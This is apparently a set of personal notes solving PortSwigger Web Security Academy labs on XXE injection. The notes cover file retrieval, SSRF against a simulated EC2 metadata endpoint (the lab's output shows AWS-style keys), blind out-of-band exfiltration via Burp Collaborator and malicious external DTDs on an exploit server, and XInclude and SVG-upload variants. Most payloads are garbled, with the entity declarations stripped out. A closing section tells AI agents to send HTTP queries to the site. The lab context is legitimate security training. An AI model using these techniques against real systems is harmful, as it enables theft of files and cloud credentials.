# XML external entity (XXE) injection
### Lab: Exploiting XXE using external entities to retrieve files
This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
**Base payload ->**
```
]>
<...>&xxe;
```
```
POST /product/stock HTTP/1.1
...
11
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
]>
&xxe;1
```
### Lab: Exploiting XXE to perform SSRF attacks
This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.
The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is . This endpoint can be used to retrieve data about the instance, some of which might be sensitive.
**Base payload ->**
```
]>
```
```
POST /product/stock HTTP/1.1
...
21
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
]>
&xxe;1
Response: "Invalid product ID: latest"
]>
Response: "Invalid product ID: meta-data"
]>
Response: "Invalid product ID: iam"
]>
Response: "Invalid product ID: security-credentials"
]>
Response: "Invalid product ID: admin"
]>
Response: "Invalid product ID: {
"Code" : "Success",
"LastUpdated" : "2021-11-18T20:54:15.719601Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "yT93WICm9RXIMVSB5CcD",
"SecretAccessKey" : "iSFxR1lEx0KCdNFnTGCdOsOtlAS8x2qVMpkBKhOE",
"Token" : "67cZGemzaw3IOPF39MboahnI0OGSf8NGtjYWoGA8uO0Rg2SE0IhYdlgJMHRKXgQJMHoPonYcS3kejBQiMaVF5nv5N8HEeYd2DWcufUwiKtr73GKRQLzbwTnVJ6HknsADpKY7Z4HPU5Kgsh02aQjqGsfqjnjLZlLnfSV04Xz3qRXrE080fPFhNuviCIq51DFkpsYDCsIW7MDnT4PMxxGLkNh6HumdFiGJse1qVwxJ21BUKFkcCZhheimiZrnUWuRz",
"Expiration" : "2027-11-17T20:54:15.719601Z"
}"
```
### Lab: Blind XXE with out-of-band interaction
This lab has a "Check stock" feature that parses XML input but does not display the result.
You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.
`l9v6h8nay5uhie9moobfyk346vcl0a.burpcollaborator.net`
**Base payload ->**
```
]>
```
```
POST /product/stock HTTP/1.1
...
201
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
]>
&xxe;1
```
### Lab: Blind XXE with out-of-band interaction via XML parameter entities
This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.
`u833k65hpt0lqm9sq8gg7wbutlzbn0.burpcollaborator.net`
**Base payload ->**
```
%xxe; ]>
```
```
POST /product/stock HTTP/1.1
...
11
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
%xxe; ]>
11
```
### Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD
This lab has a "Check stock" feature that parses XML input but does not display the result.
`u833k65hpt0lqm9sq8gg7wbutlzbn0.burpcollaborator.net`
```
POST /product/stock HTTP/1.1
...
191
```
**Exploit Server →**
```
File:
/exploit.dtd
Body:
">
%eval;
%exfiltrate;
URL:
https://exploit-ac8d1f7b1f14413ac092a6fb01000016.web-security-academy.net/exploit.dtd
```
**Base payload ->**
```
%xxe;]>
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
%xxe;]>
191
```
> Collaborator -> HTTP interaction -> Request to Collaborator
>
> GET /?x=3b2cef7412f9 HTTP/1.1
>
> User-Agent: Java/12.0.2
> This technique might not work with some file contents, including the newline characters contained in the /etc/passwd file. This is because some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL.
### Lab: Exploiting blind XXE to retrieve data via error messages
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.
```
POST /product/stock HTTP/1.1
...
81
```
**Exploit Server ->**
```
File:
/exploit.dtd
Body:
">
%eval;
%error;
URL:
https://exploit-ac9e1fd91e2510aec0bb35eb012600ff.web-security-academy.net/exploit.dtd
```
**Base payload ->**
```
%xxe;]>
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
%xxe;]>
81
```
### Lab: Exploiting XXE to retrieve data by repurposing a local DTD
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, trigger an error message containing the contents of the /etc/passwd file.
Systems using the GNOME desktop environment often have a DTD at **/usr/share/yelp/dtd/docbookx.dtd** containing an entity called **ISOamso.**
**Checking file existence ->**
```
%local_dtd;
]>
```
**Base payload ->**
```
">
%eval;
%error;
'>
%local_dtd;
]>
```
```
POST /product/stock HTTP/1.1
...
31
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
">
%eval;
%error;
'>
%local_dtd;
]>
31
```
### Lab: Exploiting XInclude to retrieve files
This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed.
Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.
**Base payload ->**
```
```
```
POST /product/stock HTTP/1.1
...
productId=10&storeId=1
```
**Answer ->**
```
POST /product/stock HTTP/1.1
...
productId=&storeId=1
```
### Lab: Exploiting XXE via image file upload
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
**image.svg ->**
```
]>
```
Post a comment with image.svg as an avatar.
You can see the value in the photo. -> 3929646265aa
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://cel1s0.gitbook.io/offsec-notes/portswigger-academy/server-side-topics/xml-external-entity-xxe-injection.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.